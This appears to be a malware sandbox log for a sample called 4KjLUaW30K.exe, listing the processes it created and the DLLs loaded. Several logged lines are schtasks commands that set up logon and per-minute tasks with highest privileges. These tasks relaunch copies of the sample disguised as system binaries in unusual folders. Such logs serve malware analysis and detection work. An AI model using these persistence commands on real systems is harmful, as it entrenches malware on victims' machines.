Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "mnUYCZffXdEgQlZPiczLektp" /sc ONLOGON /tr "'C:\Users\All Users\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "mnUYCZffXdEgQlZPiczLektpm" /sc MINUTE /mo 7 /tr "'C:\Users\All Users\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ShellExperienceHostS" /sc MINUTE /mo 5 /tr "'C:\Users\Public\Downloads\ShellExperienceHost.exe'" /f
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ShellExperienceHost" /sc ONLOGON /tr "'C:\Users\Public\Downloads\ShellExperienceHost.exe'" /rl HIGHEST /f
Source: unknown	Process created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe "C:\Program Files (x86)\mozilla maintenance service\logs\audiodg.exe"
Source: unknown	Process created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe "C:\Program Files (x86)\mozilla maintenance service\logs\audiodg.exe"
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "mnUYCZffXdEgQlZPiczLektp" /sc ONLOGON /tr "'C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe'" /rl HIGHEST /f
Source: unknown	Process created: C:\Program Files (x86)\Windows Defender\dllhost.exe "C:\Program Files (x86)\windows defender\dllhost.exe"
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "mnUYCZffXdEgQlZPiczLektpm" /sc MINUTE /mo 6 /tr "'C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe'" /rl HIGHEST /f
Source: unknown	Process created: C:\Program Files (x86)\Windows Defender\dllhost.exe "C:\Program Files (x86)\windows defender\dllhost.exe"
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Process created: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe "C:\Users\All Users\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe"
Source: unknown	Process created: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe
Source: unknown	Process created: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe
Source: unknown	Process created: C:\Users\Public\Downloads\ShellExperienceHost.exe C:\Users\Public\Downloads\ShellExperienceHost.exe
Source: unknown	Process created: C:\Users\Public\Downloads\ShellExperienceHost.exe C:\Users\Public\Downloads\ShellExperienceHost.exe
Source: unknown	Process created: C:\Recovery\System.exe C:\Recovery\System.exe
Source: unknown	Process created: C:\Recovery\System.exe C:\Recovery\System.exe
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\70189604-2a9a-4ba1-809b-491977885217.vbs"
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\28bf72c6-5a6e-449b-a0d6-76cd4ab5c11d.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe "C:\Users\All Users\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe"
Source: unknown	Process created: C:\Recovery\System.exe "C:\Recovery\System.exe"
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Process created: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe "C:\Users\All Users\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe"	Jump to behavior
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\70189604-2a9a-4ba1-809b-491977885217.vbs"
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\28bf72c6-5a6e-449b-a0d6-76cd4ab5c11d.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe "C:\Users\All Users\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe"

Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: thumbcache.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Section loaded: sspicli.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: mscoree.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: apphelp.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: version.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: uxtheme.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: windows.storage.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: wldp.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: profapi.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: cryptsp.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: rsaenh.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: cryptbase.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: sspicli.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: amsi.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: userenv.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: wbemcomn.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: iphlpapi.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: dnsapi.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: dhcpcsvc6.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: dhcpcsvc.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: winnsi.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: propsys.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: rasapi32.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: rasman.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: rtutils.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: edputil.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: urlmon.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: iertutil.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: srvcli.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: netutils.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: mswsock.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: policymanager.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: msvcp110_win.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: winhttp.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: wintypes.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: appresolver.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: bcp47langs.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: slc.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: sppc.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: rasadhlp.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: ntmarta.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: mscoree.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: apphelp.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: version.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: uxtheme.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: windows.storage.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: wldp.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: profapi.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: cryptsp.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: rsaenh.dll
